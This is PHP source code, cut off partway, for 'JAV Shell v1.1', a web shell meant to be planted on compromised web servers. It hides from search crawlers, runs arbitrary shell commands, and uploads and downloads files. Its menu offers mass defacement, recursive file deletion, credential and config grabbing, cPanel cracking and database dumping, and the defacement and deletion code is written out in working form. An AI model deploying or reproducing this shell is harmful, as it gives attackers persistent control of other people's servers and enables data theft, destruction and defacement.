JAV Shell v1.1

1. <?php
2. /*-----------------------------------------------*/
3. //////////////////////////////////////////////////////
4. ///            JAV Shell V1.1 © 2017          ///
5. ///              Code by Badc0de             ///
6. ///           Default pass maqlo            ///
7. ////////////////////////////////////////////////////
8. /*-----------------------------------------------*/
9. session_start();
10. error_reporting(0);
11. set_time_limit(0);
12. @set_magic_quotes_runtime(0);
13. @clearstatcache();
14. @ini_set('error_log',NULL);
15. @ini_set('log_errors',0);
16. @ini_set('max_execution_time',0);
17. @ini_set('output_buffering',0);
18. @ini_set('display_errors', 0);
19.  
20. $auth_pass = "3a2a26fe254d51d2b42159896c92bad0"; // default: maqlo
21. $color = "#00ff00";
22. $default_action = 'FilesMan';
23. $default_use_ajax = true;
24. $default_charset = 'UTF-8';
25. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
26.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
27.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
28.         header('HTTP/1.0 404 Not Found');
29.         exit;
30.     }
31. }
32.  
33. function login_shell() {
34. ?>
35. <html>
36. <head>
37. <title>JAV Shell v1.1</title>
38. <style type="text/css">
39. html {
40.     margin: 20px auto;
41.     background: #000000;
42.     color: green;
43.     text-align: center;
44. }
45. header {
46.     color: green;
47.     margin: 10px auto;
48. }
49. input[type=password] {
50.     width: 250px;
51.     height: 25px;
52.     color: red;
53.     background: #000000;
54.     border: 1px dotted green;
55.     padding: 5px;
56.     margin-left: 20px;
57.     text-align: center;
58. }
59. </style>
60. </head>
61. <style type='text/css'>
62. html {
63.     margin: 20px auto;
64.     background:#111111;
65.     color: Lavender;
66.     text-align: center;
67. }
68. pre {
69.     color: Lavender;
70. }
71. header {
72.     color: green;
73.     margin: 10px auto;
74. }
75. input[type=password] {
76.     width: 200px;
77.     height: 25px;
78.     color: Lavender;
79.     background: #111111;
80.     border: 1px;
81.     padding: 5px;
82.     margin-left: 20px;
83.     text-align: center;
84. }
85.  
86. .kedip {
87. -webkit-animation-name: blinker;
88. -webkit-animation-duration: 3s;
89. -webkit-animation-timing-function: linear;
90. -webkit-animation-iteration-count: infinite;
91.  
92. -moz-animation-name: blinker;
93. -moz-animation-duration: 2s;
94. -moz-animation-timing-function: linear;
95. -moz-animation-iteration-count: infinite;
96.  
97.  animation-name: blinker;
98.  animation-duration: 1s;
99.  animation-timing-function: linear;
100.  animation-iteration-count: infinite;
101.  
102.  color: Lavender;
103. }
104.  
105. @-moz-keyframes blinker {  
106.  0% { opacity: 1.0; }
107.  50% { opacity: 0.0; }
108.  100% { opacity: 1.0; }
109.  }
110.  
111. @-webkit-keyframes blinker {  
112.  0% { opacity: 1.0; }
113.  50% { opacity: 0.0; }
114.  100% { opacity: 1.0; }
115.  }
116.  
117. @keyframes blinker {  
118.  0% { opacity: 1.0; }
119.  50% { opacity: 0.0; }
120.  100% { opacity: 1.0; }
121.  }
122. </style>
123.  
124. <center>
125. <header>
126. <pre onkeydown='return false;' onmousedown='return false;' class='kedip'>
127.       \\\|||///      
128.       =       =      
129.       | "" "" |      
130.       -<0>^<0>-      
131.  ,-.  |   j   |      
132. : | :  \ ___ / "PEACE
133. `/|\'   \ - /    BRO"
134.  _______|\_/|_______
135. (       \   /       )
136. |        \%/        |
137. |   |     V     |   |
138. |   |       JAV |   |
139. |   |           |   |
140.        Ganteng ya -_-  
141.  
142.     </pre>
143. <pre>
144.  
145.  
146.     __  __      ____           _             __  _                ______                  
147.    / / / /___ _/ / /_  _______(_)___  ____ _/ /_(_)___  ____     /_  __/__  ____ _____ ___
148.   / /_/ / __ `/ / / / / / ___/ / __ \/ __ `/ __/ / __ \/ __ \     / / / _ \/ __ `/ __ `__ \
149.  / __  / /_/ / / / /_/ / /__/ / / / / /_/ / /_/ / /_/ / / / /    / / /  __/ /_/ / / / / / /
150. /_/ /_/\__,_/_/_/\__,_/\___/_/_/ /_/\__,_/\__/_/\____/_/ /_/    /_/  \___/\__,_/_/ /_/ /_/
151.                                                                                            
152.                                          
153.                                    
154. </pre>
155. </header>
156. <form method="post">
157. <input type="password" name="pass">
158. </form><br><br><br><br><br><br>
159. </form>Copyright&copy; 2017 <a href='https://www.facebook.com/groups/hallucyber/' target='_blank'><font color=#1dd1c2>Hallucination Team</font></a> thanks to <a href='https://www.facebook.com/wearenoobdefacer/' target='_BLANK'><font color=#1dd1c2>badc0de Team</a></font></center>
160.  
161. <?php
162. exit;
163. }
164. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
165.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
166.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
167.     else
168.         login_shell();
169. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
170.     @ob_clean();
171.     $file = $_GET['file'];
172.     header('Content-Description: File Transfer');
173.     header('Content-Type: application/octet-stream');
174.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
175.     header('Expires: 0');
176.     header('Cache-Control: must-revalidate');
177.     header('Pragma: public');
178.     header('Content-Length: ' . filesize($file));
179.     readfile($file);
180.     exit;
181. }
182. ?>
183. <html>
184. <head>
185. <title>JAV Shell v1.1</title>
186. <link href='https://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'>
187. <link href='https://fonts.googleapis.com/css?family=Lobster' rel='stylesheet' type='text/css'>
188. <link rel='stylesheet' type='text/css' href='http://fonts.googleapis.com/css?family=Times'>
189. <link href='https://fonts.googleapis.com/css?family=Audiowide|Space+Mono' rel='stylesheet'>
190. <link href='http://fonts.googleapis.com/css?family=Wallpoet' rel='stylesheet' type='text/css'>
191. <link href='https://fonts.googleapis.com/css?family=Gloria+Hallelujah|Permanent+Marker' rel='stylesheet'>
192. <link href='https://fonts.googleapis.com/css?family=courier+new|Permanent+Marker' rel='stylesheet'>
193. <link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
194. <link href='http://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>
195. <link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
196. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
197. <link href='http://fonts.googleapis.com/css?family=Allerta+Stencil' rel='stylesheet' type='text/css'>
198. <link href='http://fonts.googleapis.com/css?family=Kumar+One+Outline' rel='stylesheet' type='text/css'>
199. <link href='https://fonts.googleapis.com/css?family=Bungee+Shade|Monoton|Nova+Square' rel='stylesheet'>
200. <link href='https://fonts.googleapis.com/css?family=Arvo|Electrolize|Iceberg' rel='stylesheet'><meta name='author' content='Badc0de'>
201. <meta charset="UTF-8">
202. <style type='text/css'>
203. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
204. html {
205.     background: #000000;
206.     color: #ffffff;
207.     font-family: 'Ubuntu';
208.     font-size: 13px;
209.     width: 100%;
210. }
211. li {
212.     display: inline;
213.     margin: 5px;
214.     padding: 5px;
215. }
216. table, th, td {
217.     border-collapse:collapse;
218.     font-family: Tahoma, Geneva, sans-serif;
219.     background: transparent;
220.     font-family: 'Ubuntu';
221.     font-size: 13px;
222. }
223. .table_home, .th_home, .td_home {
224.     border: 1px solid #ffffff;
225. }
226. th {
227.     padding: 10px;
228. }
229. a {
230.     color: #ffffff;
231.     text-decoration: none;
232. }
233. a:hover {
234.     color: gray;
235.     text-decoration: underline;
236. }
237. b {
238.     color: gray;
239. }
240. input[type=text], input[type=password],input[type=submit] {
241.     background: transparent;
242.     color: #ffffff;
243.     border: 1px solid #ffffff;
244.     margin: 5px auto;
245.     padding-left: 5px;
246.     font-family: 'Ubuntu';
247.     font-size: 13px;
248. }
249. textarea {
250.     border: 1px solid #ffffff;
251.     width: 100%;
252.     height: 400px;
253.     padding-left: 5px;
254.     margin: 10px auto;
255.     resize: none;
256.     background: transparent;
257.     color: #ffffff;
258.     font-family: 'Ubuntu';
259.     font-size: 13px;
260. }
261. select {
262.     width: 152px;
263.     background: #000000;
264.     color: lime;
265.     border: 1px solid #ffffff;
266.     margin: 5px auto;
267.     padding-left: 5px;
268.     font-family: 'Ubuntu';
269.     font-size: 13px;
270. }
271. option:hover {
272.     background: lime;
273.     color: #000000;
274. }
275. </style>
276. </head>
277. <style type='text/css'>
278. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
279. html {
280.     background: #000000;
281.     color: #ffffff;
282.     font-family: 'Iceberg';
283.     font-size: 12px;
284.     width: 100%;
285. }
286. li {
287.     display: inline;
288.     margin: 2px;
289.     padding: 2px;
290. }
291.  
292.  #menu a {
293.                 padding:2px 10px;  
294.                 margin:0;
295.                 background:#222222;
296.                 text-decoration:none;
297.                 letter-spacing:2px;
298.                 padding: 2px 10px;
299.                 margin: 0;
300.                 background: #222222;
301.                 text-decoration: none;
302.                 letter-spacing: 2px;
303.                 border-radius: 2px;
304.                 border-bottom: 2px solid gray;
305.                 border-top: 2px solid gray;
306.                 border-right: 2px solid Lavender;
307.                 border-left: 2px solid Lavender;
308.        }
309.        #menu a:hover {
310.             background:#180000;
311.             border-bottom:0px solid #333333;
312.             border-top:0px solid #333333;
313.        }
314. table tr:first-child{  
315.     background: transparent;
316.     text-align: center;
317.     color: Lavender;
318. }
319. table, th, td {
320.     border-collapse:collapse;
321.     font-family: Tahoma, Geneva, sans-serif;
322.     background: transparent;
323.     font-family: 'Iceberg';
324.     font-size: 13px;
325. }
326. .table_home, .th_home, .td_home {
327.     border: 1px solid #1882a3;
328. }
329. .td_home:hover {
330.     background:#06e2a8;
331. }
332. th {
333.     padding: 10px;
334. }
335. a {
336.     color: #ffffff;
337.     text-decoration: none;
338. }
339. a:hover {
340.     color: lavender;
341.     text-decoration: underline;
342. }
343. b {
344.     color: lavender;
345. }
346. input[type=text], input[type=password],input[type=submit] {
347.     background: transparent;
348.     color: #ffffff;
349.     border: 1px solid #ffffff;
350.     margin: 5px auto;
351.     padding-left: 5px;
352.     font-family: 'Iceberg';
353.     font-size: 13px;
354. }
355. input[type=submit] {
356.     background: transparent;
357.     color: #ffffff;
358.     border: 1px solid #ffffff;
359.     margin: 5px auto;
360.     padding-left: 5px;
361.     font-family: 'Iceberg';
362.     font-size: 13px;
363.     cursor:pointer;
364. }
365. textarea {
366.     border: 1px solid #ffffff;
367.     width: 100%;
368.     height: 400px;
369.     padding-left: 5px;
370.     margin: 10px auto;
371.     resize: none;
372.     background: transparent;
373.     color: #ffffff;
374.     font-family: 'Iceberg';
375.     font-size: 13px;
376. }
377. select {
378.     width: 152px;
379.     background: #000000;
380.     color: Lavender;
381.     border: 1px solid #ffffff;
382.     margin: 5px auto;
383.     padding-left: 5px;
384.     font-family: 'Iceberg';
385.     font-size: 13px;
386. }
387. option:hover {
388.     background: #ff0066;
389.     color: #000000;
390. }
391. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
392. .cgx2 {text-align: center;letter-spacing:1px;font-family: "Iceberg";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
393. .infoweb {
394.     border-right: 1px solid #00FFFF;
395. }
396. </style>
397. <?php
398. ###############################################################################
399. // NEST JAV SHELL v1.0
400. // Recode From Badc0de
401. // https://reportcode.blogspot.co.id
402. // Recoded By Hallucination Team
403. // Greetz: ./p0tz ~ Hallucination Team ~ All My Friens & Special Thanks to : Badc0de
404. ###############################################################################
405. function w($dir,$perm) {
406.     if(!is_writable($dir)) {
407.         return "<font color=red>".$perm."</font>";
408.     } else {
409.         return "<font color=lime>".$perm."</font>";
410.     }
411. }
412. function r($dir,$perm) {
413.     if(!is_readable($dir)) {
414.         return "<font color=red>".$perm."</font>";
415.     } else {
416.         return "<font color=lime>".$perm."</font>";
417.     }
418. }
419. function exe($cmd) {
420.     if(function_exists('system')) {        
421.         @ob_start();       
422.         @system($cmd);     
423.         $buff = @ob_get_contents();        
424.         @ob_end_clean();       
425.         return $buff;  
426.     } elseif(function_exists('exec')) {        
427.         @exec($cmd,$results);      
428.         $buff = "";        
429.         foreach($results as $result) {         
430.             $buff .= $result;      
431.         } return $buff;    
432.     } elseif(function_exists('passthru')) {        
433.         @ob_start();       
434.         @passthru($cmd);       
435.         $buff = @ob_get_contents();        
436.         @ob_end_clean();       
437.         return $buff;  
438.     } elseif(function_exists('shell_exec')) {      
439.         $buff = @shell_exec($cmd);     
440.         return $buff;  
441.     }
442. }
443. function perms($file){
444.     $perms = fileperms($file);
445.     if (($perms & 0xC000) == 0xC000) {
446.     // Socket
447.     $info = 's';
448.     } elseif (($perms & 0xA000) == 0xA000) {
449.     // Symbolic Link
450.     $info = 'l';
451.     } elseif (($perms & 0x8000) == 0x8000) {
452.     // Regular
453.     $info = '-';
454.     } elseif (($perms & 0x6000) == 0x6000) {
455.     // Block special
456.     $info = 'b';
457.     } elseif (($perms & 0x4000) == 0x4000) {
458.     // Directory
459.     $info = 'd';
460.     } elseif (($perms & 0x2000) == 0x2000) {
461.     // Character special
462.     $info = 'c';
463.     } elseif (($perms & 0x1000) == 0x1000) {
464.     // FIFO pipe
465.     $info = 'p';
466.     } else {
467.     // Unknown
468.     $info = 'u';
469.     }
470.         // Owner
471.     $info .= (($perms & 0x0100) ? 'r' : '-');
472.     $info .= (($perms & 0x0080) ? 'w' : '-');
473.     $info .= (($perms & 0x0040) ?
474.     (($perms & 0x0800) ? 's' : 'x' ) :
475.     (($perms & 0x0800) ? 'S' : '-'));
476.     // Group
477.     $info .= (($perms & 0x0020) ? 'r' : '-');
478.     $info .= (($perms & 0x0010) ? 'w' : '-');
479.     $info .= (($perms & 0x0008) ?
480.     (($perms & 0x0400) ? 's' : 'x' ) :
481.     (($perms & 0x0400) ? 'S' : '-'));
482.     // World
483.     $info .= (($perms & 0x0004) ? 'r' : '-');
484.     $info .= (($perms & 0x0002) ? 'w' : '-');
485.     $info .= (($perms & 0x0001) ?
486.     (($perms & 0x0200) ? 't' : 'x' ) :
487.     (($perms & 0x0200) ? 'T' : '-'));
488.     return $info;
489. }
490. function hdd($s) {
491.     if($s >= 1073741824)
492.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
493.     elseif($s >= 1048576)
494.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
495.     elseif($s >= 1024)
496.     return sprintf('%1.2f',$s / 1024 ) .' KB';
497.     else
498.     return $s .' B';
499. }
500. function ambilKata($param, $kata1, $kata2){
501.     if(strpos($param, $kata1) === FALSE) return FALSE;
502.     if(strpos($param, $kata2) === FALSE) return FALSE;
503.     $start = strpos($param, $kata1) + strlen($kata1);
504.     $end = strpos($param, $kata2, $start);
505.     $return = substr($param, $start, $end - $start);
506.     return $return;
507. }
508. function getsource($url) {
509.     $curl = curl_init($url);
510.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
511.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
512.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
513.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
514.     $content = curl_exec($curl);
515.             curl_close($curl);
516.     return $content;
517. }
518. function bing($dork) {
519.     $npage = 1;
520.     $npages = 30000;
521.     $allLinks = array();
522.     $lll = array();
523.     while($npage <= $npages) {
524.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
525.         if($x) {
526.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
527.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
528.             $npage = $npage + 10;
529.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
530.         } else break;
531.     }
532.     $URLs = array();
533.     foreach($allLinks as $url){
534.         $exp = explode("/", $url);
535.         $URLs[] = $exp[2];
536.     }
537.     $array = array_filter($URLs);
538.     $array = array_unique($array);
539.     $sss = count(array_unique($array));
540.     foreach($array as $domain) {
541.         echo $domain."\n";
542.     }
543. }
544. function reverse($url) {
545.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
546.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
547.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
548.           curl_setopt($ch, CURLOPT_HEADER, 0);
549.           curl_setopt($ch, CURLOPT_POST, 1);
550.     $resp = curl_exec($ch);
551.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
552.     $array = explode(",,", $resp);
553.     unset($array[0]);
554.     foreach($array as $lnk) {
555.         $lnk = "http://$lnk";
556.         $lnk = str_replace(",", "", $lnk);
557.         echo $lnk."\n";
558.         ob_flush();
559.         flush();
560.     }
561.         curl_close($ch);
562. }
563. if(get_magic_quotes_gpc()) {
564.     function idx_ss($array) {
565.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
566.     }
567.     $_POST = idx_ss($_POST);
568.     $_COOKIE = idx_ss($_COOKIE);
569. }
570.  
571. if(isset($_GET['dir'])) {
572.     $dir = $_GET['dir'];
573.     chdir($dir);
574. } else {
575.     $dir = getcwd();
576. }
577. $kernel = php_uname();
578. $ip = gethostbyname($_SERVER['HTTP_HOST']);
579. $dir = str_replace("\\","/",$dir);
580. $scdir = explode("/", $dir);
581. $freespace = hdd(disk_free_space("/"));
582. $total = hdd(disk_total_space("/"));
583. $used = $total - $freespace;
584. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
585. $ds = @ini_get("disable_functions");
586. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
587. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
588. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
589. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
590. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
591. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
592. if(!function_exists('posix_getegid')) {
593.     $user = @get_current_user();
594.     $uid = @getmyuid();
595.     $gid = @getmygid();
596.     $group = "?";
597. } else {
598.     $uid = @posix_getpwuid(posix_geteuid());
599.     $gid = @posix_getgrgid(posix_getegid());
600.     $user = $uid['name'];
601.     $uid = $uid['uid'];
602.     $group = $gid['name'];
603.     $gid = $gid['gid'];
604. }
605. echo "<style type='text/css'>
606. html {
607.    margin: 20px auto;
608.    background:#111111;
609.    color: Lavender;
610.    text-align: center;
611. }
612. pre {
613.    color: cyan;
614. }
615. header {
616.    color: green;
617.    margin: 10px auto;
618. }
619. input[type=password] {
620.    width: 200px;
621.    height: 25px;
622.    color: cyan;
623.    background: #111111;
624.    border: 1px;
625.    padding: 5px;
626.    margin-left: 20px;
627.    text-align: center;
628. }
629.  
630. .kedip {
631. -webkit-animation-name: blinker;
632. -webkit-animation-duration: 3s;
633. -webkit-animation-timing-function: linear;
634. -webkit-animation-iteration-count: infinite;
635.  
636. -moz-animation-name: blinker;
637. -moz-animation-duration: 2s;
638. -moz-animation-timing-function: linear;
639. -moz-animation-iteration-count: infinite;
640.  
641. animation-name: blinker;
642. animation-duration: 1s;
643. animation-timing-function: linear;
644. animation-iteration-count: infinite;
645.  
646. color: cyan;
647. }
648.  
649. @-moz-keyframes blinker {  
650. 0% { opacity: 1.0; }
651. 50% { opacity: 0.0; }
652. 100% { opacity: 1.0; }
653. }
654.  
655. @-webkit-keyframes blinker {  
656. 0% { opacity: 1.0; }
657. 50% { opacity: 0.0; }
658. 100% { opacity: 1.0; }
659. }
660.  
661. @keyframes blinker {  
662. 0% { opacity: 1.0; }
663. 50% { opacity: 0.0; }
664. 100% { opacity: 1.0; }
665. }
666. </style>
667. <pre onkeydown='return false;' onmousedown='return false;' class='kedip'>
668.  _    _       _ _            _             _   _                _____      _                  _____ _          _ _
669. | |  | |     | | |          (_)           | | (_)              / ____|    | |                / ____| |        | | |
670. | |__| | __ _| | |_   _  ___ _ _ __   __ _| |_ _  ___  _ __   | |    _   _| |__   ___ _ __  | (___ | |__   ___| | |
671. |  __  |/ _` | | | | | |/ __| | '_ \ / _` | __| |/ _ \| '_ \  | |   | | | | '_ \ / _ \ '__|  \___ \| '_ \ / _ \ | |
672. | |  | | (_| | | | |_| | (__| | | | | (_| | |_| | (_) | | | | | |___| |_| | |_) |  __/ |     ____) | | | |  __/ | |
673. |_|  |_|\__,_|_|_|\__,_|\___|_|_| |_|\__,_|\__|_|\___/|_| |_|  \_____\__, |_.__/ \___|_|    |_____/|_| |_|\___|_|_|
674.                                                                       __/ |                                        
675.                                                                      |___/                                        
676.                        
677. </pre></font>";
678. echo "<hr color=#1dd1c2>";
679. echo "<center>";
680. echo "System: <font color=lime>".$kernel."</font><br>";
681. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
682. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
683. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
684. echo "Safe Mode: $sm<br>";
685. echo "Tungsi yang Tidak Dijinkan: $show_ds<br>";
686. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
687. echo "Current DIR: ";
688. foreach($scdir as $c_dir => $cdir) {   
689.     echo "<a href='?dir=";
690.     for($i = 0; $i <= $c_dir; $i++) {
691.         echo $scdir[$i];
692.         if($i != $c_dir) {
693.         echo "/";
694.         }
695.     }
696.     echo "'>$cdir</a>/";
697. }
698. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
699. echo "<hr color=#1dd1c2>";
700. echo "<div id='menu'>";
701. echo "<center>";
702. echo "<ul>";
703. echo "<li><a href='?'>Home</a></li>";
704. echo "<li><a href='?dir=$dir&do=upload'>Upload</a></li>";
705. echo "<li><a href='?dir=$dir&do=cmd'>Command</a></li>";
706. echo "<li><a href='?dir=$dir&do=mass_deface'>Mass Deface</a></li>";
707. echo "<li><a href='?dir=$dir&do=mass_delete'>Mass Delete</a></li>";
708. echo "<li><a href='?dir=$dir&do=config'>Config</a></li>";
709. echo "<li><a href='?dir=$dir&do=symconfig'>Config V.2</a></li>";
710. echo "<li><a href='?dir=$dir&do=jumping'>Jumping</a></li>";
711. echo "<li><a href='?dir=$dir&do=symlink'>Symlink</a></li>";
712. echo "<li><a href='?dir=$dir&do=cpanel'>CPanel Crack</a></li>";
713. echo "<li><a href='?dir=$dir&do=smtp'>SMTP Grabber</a></li>";
714. echo "<li><a href='?dir=$dir&do=magen'>Magento DB Info</a></li><br><br>";
715. echo "<li><a href='?dir=$dir&do=zoneh'>Zone-H</a></li>";
716. echo "<li><a href='?dir=$dir&do=defacerid'>Defacer-ID</a></li>";
717. echo "<li><a href='?dir=$dir&do=cgi'>CGI Telnet</a></li>";
718. echo "<li><a href='?dir=$dir&do=network'>network</a></li>";
719. echo "<li><a href='?dir=$dir&do=adminer'>Adminer</a></li>";
720. echo "<li><a href='?dir=$dir&do=fake_root'>Fake Root</a></li>";
721. echo "<li><a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a></li>";
722. echo "<li><a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a></li>";
723. echo "<li> <a href='?dir=$dir&do=decode'>Encode/Decode</a> </li><br><br>";
724. echo "<li> <a href='?dir=$dir&do=dbdump'>DB Dump</a> </li>";
725. echo "<li><a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a></li>";
726. echo "<li><a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a></li>";
727. echo "<li><a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></li>";
728. echo "<li><a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a></li>";
729. echo "<li> <a href='?dir=$dir&do=adfin'>Admin Finder</a></li><br><br>";
730. echo "<li><a href='?dir=$dir&do=contact'>Contact Me</a></li>";
731. echo "<li><a href='?dir=$dir&do=about'>About Me</a></li>";
732. echo "<li><a style='color: red;' href='?logout=true'>Logout</a></li>";
733. echo "</ul>";
734. echo "</div>";
735. echo "</center>";
736. echo "<hr color=#1dd1c2>";
737. if($_GET['logout'] == true) {
738.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
739.     echo "<script>window.location='?';</script>";
740. } elseif($_GET['do'] == 'upload') {
741.     echo "<center>";
742.     if($_POST['upload']) {
743.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
744.             $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
745.         } else {
746.             $act = "<font color=red>failed to upload file</font>";
747.         }
748.     }
749.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
750.     echo $act;
751.     echo "</center>";
752. } elseif($_GET['do'] == 'cmd') {
753.     if($_POST['do_cmd']) {
754.         echo "<pre>".exe($_POST['cmd'])."</pre>";
755.     }
756. } elseif($_GET['do'] == 'mass_deface') {
757.     echo "<center><form action=\"\" method=\"post\">\n";
758.     $dirr=$_POST['d_dir'];
759.     $index = $_POST["script"];
760.     $index = str_replace('"',"'",$index);
761.     $index = stripslashes($index);
762.     function edit_file($file,$index){
763.         if (is_writable($file)) {
764.         clear_fill($file,$index);
765.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
766.         }
767.         else {
768.             echo "<Span style='color:#800000;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
769.             }
770.             }
771.     function hapus_massal($dir,$namafile) {
772.         if(is_writable($dir)) {
773.             $dira = scandir($dir);
774.             foreach($dira as $dirb) {
775.                 $dirc = "$dir/$dirb";
776.                 $lokasi = $dirc.'/'.$namafile;
777.                 if($dirb === '.') {
778.                     if(file_exists("$dir/$namafile")) {
779.                         unlink("$dir/$namafile");
780.                     }
781.                 } elseif($dirb === '..') {
782.                     if(file_exists("".dirname($dir)."/$namafile")) {
783.                         unlink("".dirname($dir)."/$namafile");
784.                     }
785.                 } else {
786.                     if(is_dir($dirc)) {
787.                         if(is_writable($dirc)) {
788.                             if(file_exists($lokasi)) {
789.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
790.                                 unlink($lokasi);
791.                                 $idx = hapus_massal($dirc,$namafile);
792.                             }
793.                         }
794.                     }
795.                 }
796.             }
797.         }
798.     }
799.     function clear_fill($file,$index){
800.         if(file_exists($file)){
801.             $handle = fopen($file,'w');
802.             fwrite($handle,'');
803.             fwrite($handle,$index);
804.             fclose($handle);  } }
805.  
806.     function gass(){
807.         global $dirr , $index ;
808.         chdir($dirr);
809.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
810.         $files = scandir($dirr) ;
811.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
812.         sort($files);
813.         $n = 0 ;
814.         foreach ($files as $file){
815.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
816.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
817.                 edit_file($file,$index);
818.                 flush();
819.                 $n = $n +1 ;
820.                 }
821.                 }
822.                 echo "<br>";
823.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
824.                     }
825.     function ListFiles($dirrall) {
826.  
827.     if($dh = opendir($dirrall)) {
828.  
829.        $files = Array();
830.        $inner_files = Array();
831.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
832.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
833.         while($file = readdir($dh)) {
834.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
835.                 if(is_dir($dirrall . "/" . $file)) {
836.                     $inner_files = ListFiles($dirrall . "/" . $file);
837.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
838.                 } else {
839.                     array_push($files, $dirrall . "/" . $file);
840.                 }
841.             }
842.             }
843.  
844.             closedir($dh);
845.             return $files;
846.         }
847.     }
848.     function gass_all(){
849.         global $index ;
850.         $dirrall=$_POST['d_dir'];
851.         foreach (ListFiles($dirrall) as $key=>$file){
852.             $file = str_replace('//',"/",$file);
853.             echo "<center><strong>$file</strong> ===>";
854.             edit_file($file,$index);
855.             flush();
856.         }
857.         $key = $key+1;
